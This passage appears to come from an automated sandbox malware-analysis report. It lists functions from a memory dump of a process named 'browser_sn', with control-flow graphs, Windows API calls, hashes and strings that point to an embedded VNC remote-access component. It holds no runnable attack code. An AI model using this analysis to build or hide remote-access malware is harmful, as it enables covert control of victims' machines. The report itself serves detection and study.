7ff790c39f8f-7ff790c39fa8 call 7ff790ce85e0 598->607 606->597 609 7ff790c39fb6-7ff790c39fba call 7ff790ce7914 606->609 607->606 609->597
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Service$CloseConfigEnumErrorHandleLastOpenQueryServicesStatus$Manager
                                                      • String ID:
                                                      • API String ID: 3151975580-0
                                                      • Opcode ID: a88dcc922a7d0e3135acbe79f47d9f0db8252c8db9b2e0ad08749d92f243f662
                                                      • Instruction ID: febdad8acfb8ebc0871330e053b2ba217891653aa72915c2acb4e0e6cf408f50
                                                      • Opcode Fuzzy Hash: a88dcc922a7d0e3135acbe79f47d9f0db8252c8db9b2e0ad08749d92f243f662
                                                      • Instruction Fuzzy Hash: C7916C32B28A4189EB20EBB5D4046EDB3B1EF497A8F804635DE1D56B99DE38E505C310

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 304 7ff790c58590-7ff790c585de call 7ff790c33730 307 7ff790c585e0-7ff790c585e9 304->307 308 7ff790c5862f-7ff790c58639 304->308 311 7ff790c585eb-7ff790c5860e SendMessageA WaitForSingleObject 307->311 312 7ff790c58612-7ff790c5861c 307->312 309 7ff790c5863b-7ff790c5863e 308->309 310 7ff790c58645-7ff790c5864f 308->310 309->310 313 7ff790c5865d-7ff790c58664 310->313 314 7ff790c58651-7ff790c58656 call 7ff790ce8bf4 310->314 311->312 315 7ff790c5861e-7ff790c58626 call 7ff790c44110 312->315 316 7ff790c58628 312->316 318 7ff790c5869b-7ff790c586a5 313->318 319 7ff790c58666-7ff790c58688 call 7ff790c33730 313->319 314->313 315->316 316->308 320 7ff790c586a7-7ff790c586ac call 7ff790ce78d4 318->320 321 7ff790c586b3-7ff790c586bd 318->321 332 7ff790c5868a-7ff790c5868d 319->332 333 7ff790c58694 319->333 320->321 325 7ff790c586cb-7ff790c586d5 321->325 326 7ff790c586bf-7ff790c586c4 call 7ff790ce78d4 321->326 330 7ff790c586dc-7ff790c586e6 325->330 331 7ff790c586d7 call 7ff790ce78d4 325->331 326->325 336 7ff790c586ed-7ff790c586f7 330->336 337 7ff790c586e8 call 7ff790ce78d4 330->337 331->330 332->333 333->318 339 7ff790c586fe-7ff790c58704 336->339 340 7ff790c586f9 call 7ff790ce78d4 336->340 337->336 342 7ff790c58757-7ff790c58761 339->342 343 7ff790c58706-7ff790c5870d 339->343 340->339 345 7ff790c58768-7ff790c58772 342->345 346 7ff790c58763 call 7ff790ce8bf4 342->346 343->342 344 7ff790c5870f-7ff790c58719 343->344 350 7ff790c5871b-7ff790c58723 344->350 351 7ff790c58736-7ff790c5873e call 7ff790c9a220 344->351 348 7ff790c5877a-7ff790c58782 345->348 349 7ff790c58774-7ff790c58779 call 7ff790ce8bf4 345->349 346->345 353 7ff790c58784-7ff790c5878b call 7ff790ce7914 348->353 354 7ff790c58790-7ff790c587b3 348->354 349->348 350->342 362 7ff790c58725-7ff790c58734 350->362 351->342 364 7ff790c58740-7ff790c58751 SendMessageA 351->364 353->354 359 7ff790c587bc-7ff790c587dc call 7ff790ce78d4 * 2 354->359 360 7ff790c587b5-7ff790c587bb FreeLibrary 354->360 369 7ff790c587de-7ff790c587e5 call 7ff790ce7914 359->369 370 7ff790c587ea-7ff790c58896 DeleteObject call 7ff790ce8bf4 DeleteObject call 7ff790ce8bf4 DeleteObject call 7ff790ce8bf4 DeleteObject call 7ff790ce8bf4 359->370 360->359 362->342 362->351 364->342 369->370
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: free$Object$Delete$MessageSend$FreeLibrarySingleWait
                                                      • String ID: vncclient.cpp : deleting socket$vncclient.cpp : ~vncClient() executing...
                                                      • API String ID: 2172171234-2418058073
                                                      • Opcode ID: fd6e93333f79ed3293ab94359e9080bfa85a2ad45a32625ec314112d417f8769
                                                      • Instruction ID: 536c463724a34da2a478304be1503131a80cf9e09ebae581a45c4014feb4a1b8
                                                      • Opcode Fuzzy Hash: fd6e93333f79ed3293ab94359e9080bfa85a2ad45a32625ec314112d417f8769
                                                      • Instruction Fuzzy Hash: CE811836A29A8285FB64EF31D8943F9A360FF85F94F880131DA0D6B795CF29E445C320

                                                      Control-flow Graph

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessageSend$DialogItemLongWindowmallocstd::exception::exception
                                                      • String ID:
                                                      • API String ID: 1935883720-0
                                                      • Opcode ID: 7be5ccecca7b2e798f0e3ae60729954586f2e76e6c9a6f26eb5410dab4250f23
                                                      • Instruction ID: 72bff69500445fa70ad20213443c28110f0b92f06a5dac833c73a3f4f7d965e4
                                                      • Opcode Fuzzy Hash: 7be5ccecca7b2e798f0e3ae60729954586f2e76e6c9a6f26eb5410dab4250f23
                                                      • Instruction Fuzzy Hash: A5618121B18A4282EB20AB35E4587BAA3B1FF89F94F905131DE5E47B95DF3CE445C710

                                                      Control-flow Graph

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLast$Current$CriticalSectionThread$Process$AllocDuplicateEnterExceptionHandleInitializeLeavePriorityRaiseReleaseSemaphoreValue
                                                      • String ID:
                                                      • API String ID: 772457954-0
                                                      • Opcode ID: 6724cc30325cfb9ab06b351ea06354c6b11979decb25812fb5b84730cc05a7b3
                                                      • Instruction ID: a9b905a361328da50a1e65d8e44f31206c278a05dfdba707fb9a3e0f869223a5
                                                      • Opcode Fuzzy Hash: 6724cc30325cfb9ab06b351ea06354c6b11979decb25812fb5b84730cc05a7b3
                                                      • Instruction Fuzzy Hash: 84613E35A28B1286EA60AF35E8482B9E3B0FF45B84F946535DA4D437A5DF3CF046C720

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 489 7ff790c4f940-7ff790c4f979 490 7ff790c4f980-7ff790c4f9ab 489->490 491 7ff790c4fb19-7ff790c4fb25 490->491 492 7ff790c4f9b1-7ff790c4f9cc call 7ff790ce7c50 490->492 493 7ff790c4fb29-7ff790c4fb42 call 7ff790ce7d30 491->493 498 7ff790c4f9cf 492->498 500 7ff790c4fb44 493->500 501 7ff790c4fb50-7ff790c4fb69 call 7ff790ce7d30 493->501 499 7ff790c4f9d1-7ff790c4f9d3 498->499 502 7ff790c4fb49-7ff790c4fb4b 499->502 503 7ff790c4f9d9-7ff790c4f9e5 499->503 500->490 501->502 511 7ff790c4fb6b-7ff790c4fb95 call 7ff790ce8bbc 501->511 505 7ff790c4fc43-7ff790c4fc6d call 7ff790ce7220 502->505 506 7ff790c4f9eb-7ff790c4f9f4 503->506 507 7ff790c4fae6-7ff790c4fafc SleepEx 503->507 509 7ff790c4faaa 506->509 510 7ff790c4f9fa-7ff790c4fa02 506->510 516 7ff790c4fb02-7ff790c4fb04 507->516 517 7ff790c4faaf-7ff790c4fab8 call 7ff790c9d1f0 509->517 510->509 513 7ff790c4fa08-7ff790c4fa0f 510->513 511->502 526 7ff790c4fb97-7ff790c4fbf8 call 7ff790c33730 511->526 519 7ff790c4fa39-7ff790c4fa44 513->519 520 7ff790c4fa11-7ff790c4fa34 513->520 522 7ff790c4fb06-7ff790c4fb0d 516->522 523 7ff790c4fb12-7ff790c4fb14 516->523 524 7ff790c4fabd-7ff790c4fac8 517->524 527 7ff790c4fa5e-7ff790c4fa9e EnterCriticalSection LeaveCriticalSection 519->527 528 7ff790c4fa46-7ff790c4fa5c 519->528 525 7ff790c4faca-7ff790c4fae4 call 7ff790c9d890 520->525 522->498 523->499 524->507 524->525 525->493 525->507 538 7ff790c4fc3e 526->538 539 7ff790c4fbfa-7ff790c4fc06 526->539 535 7ff790c4faa4-7ff790c4faa8 527->535 528->535 535->517 538->505 539->538 540 7ff790c4fc08-7ff790c4fc1d 539->540 540->538 542 7ff790c4fc1f-7ff790c4fc2c 540->542 542->538 543 7ff790c4fc2e-7ff790c4fc3a 542->543 543->538
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CriticalSection$EnterLeaveSleepsprintfswscanf
                                                      • String ID: 0.0.0.0$REP$RFB$RFB %03d.%03d$false$i$true$vncclient.cpp : m_ms_logon set to %s
                                                      • API String ID: 958158500-3765181313
                                                      • Opcode ID: 1bbc69bf7bb785b75e95c5cc589f663b48bba7a26dfe6112371c6df2dcd9451f
                                                      • Instruction ID: cd0a3f6ca480a34d59ce5fe0c4ad7bf2bcd564ff4bf749d7bb0c19f41d339448
                                                      • Opcode Fuzzy Hash: 1bbc69bf7bb785b75e95c5cc589f663b48bba7a26dfe6112371c6df2dcd9451f
                                                      • Instruction Fuzzy Hash: AE91C332628B8286EB70DB35E4487EAB7A5FB86B94F800136DA4D43794CF7CE546C710

                                                      Control-flow Graph

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Process$AddressCloseHandleLibraryOpenProc$CreateCurrentFirstFreeLoadMetricsProcess32SessionSnapshotSystemTokenToolhelp32
                                                      • String ID: ?
                                                      • API String ID: 2900023865-1684325040
                                                      • Opcode ID: febb9543f439330e09f6a3bb3b030836e2934ac63594c7e2729f7f74b439011d
                                                      • Instruction ID: 71476a64d2019076aab7f9a144bab9d5472acfdf14975989156904d5118d690f
                                                      • Opcode Fuzzy Hash: febb9543f439330e09f6a3bb3b030836e2934ac63594c7e2729f7f74b439011d
                                                      • Instruction Fuzzy Hash: B131E532619B8285E760AB35F8443AAB3F4FB8A784F904135DA8D47B58EF3DE055CB50

                                                      Control-flow Graph

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateRect$AddressLibraryLoadProcmalloc
                                                      • String ID: SendInput$USER32$vncclient.cpp : TEST 4$vncclient.cpp : vncClient() executing...
                                                      • API String ID: 1369618222-3178290357
                                                      • Opcode ID: 59c5cb1e7166b4b1d70f07f65a41a2d60febf100e89283cd68553da4dcc8056f
                                                      • Instruction ID: 015752607a5f31f5455b6146a783896a7ddf6092a37ce074af042fee62c3e952
                                                      • Opcode Fuzzy Hash: 59c5cb1e7166b4b1d70f07f65a41a2d60febf100e89283cd68553da4dcc8056f
                                                      • Instruction Fuzzy Hash: F6B13832625BD1A6E358CF38EA443D9B7A8F744B44F54423AE3A807B91CF79A076C750

                                                      Control-flow Graph

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLast$CriticalSectionThread$EnterExceptionLeavePriorityRaiseResume
                                                      • String ID:
                                                      • API String ID: 1366308849-0
                                                      • Opcode ID: 63ef2765017d1710e1b3fde4549e7b5a362e36a6304331ef8a9692e50ded8925
                                                      • Instruction ID: b31f7c9da672dc97f91875539d90120b27e61c5f714f7d9edb5c29476df1cda3
                                                      • Opcode Fuzzy Hash: 63ef2765017d1710e1b3fde4549e7b5a362e36a6304331ef8a9692e50ded8925
                                                      • Instruction Fuzzy Hash: 6C315A22A2864386EB20AF34E4551A9F3B0FF85358F901636D64D437A9DF7DF589C720

                                                      Control-flow Graph

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: setsockopt$ConnectionIoctlStatsgetpeernamegetsockname
                                                      • String ID:
                                                      • API String ID: 2120259006-0
                                                      • Opcode ID: c49f95ef961e3e379a6d047de3f2c4db0e5666ab8321b85981a4bd72149005e7
                                                      • Instruction ID: d25b8037d9bf4541605239c16deeee595fbb24d184dc5caf4418c1cde76d5cda
                                                      • Opcode Fuzzy Hash: c49f95ef961e3e379a6d047de3f2c4db0e5666ab8321b85981a4bd72149005e7
                                                      • Instruction Fuzzy Hash: 5D513472214B81DEE724DF30D4842D9B7A4FB4871CF404526EB5C87B48EB78E6A5CB60

                                                      Control-flow Graph

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateErrorLastThread_errno_getptd_invalid_parameter_noinfofree
                                                      • String ID:
                                                      • API String ID: 3283625137-0
                                                      • Opcode ID: d7d1bbc1acb5388812442ca131e75b053374a14ef8d2c0d32f7c34c2cb7a35d3
                                                      • Instruction ID: 89977564978105c71be44848c204123e3aff6a1c49efeb7f746add03e1409cf6
                                                      • Opcode Fuzzy Hash: d7d1bbc1acb5388812442ca131e75b053374a14ef8d2c0d32f7c34c2cb7a35d3
                                                      • Instruction Fuzzy Hash: DC21B221A187819AE620BB71A5122EAF2A4BF86B90FC44135EF5C037D6CF3CF5518711

                                                      Control-flow Graph

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ComputerLibraryLoadName
                                                      • String ID: RICHED32.DLL$Rich Edit Dll Loading$Unable to load the Rich Edit (RICHED32.DLL) control!
                                                      • API String ID: 2278097360-3189507618
                                                      • Opcode ID: a0e48cd9bca1a580f90c0fe309f8f060cfac1904e258431fe3c2638ac3c22389
                                                      • Instruction ID: af26637684ed37ea75e0e64577e90b0f20c629075e0ba9c09837da1b9e0cd49f
                                                      • Opcode Fuzzy Hash: a0e48cd9bca1a580f90c0fe309f8f060cfac1904e258431fe3c2638ac3c22389
                                                      • Instruction Fuzzy Hash: 4431BF21B28B0281EBA8FB3AF4153A9A691EF86B44F404138CB4D073E5EE3DE454C360

                                                      Control-flow Graph

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
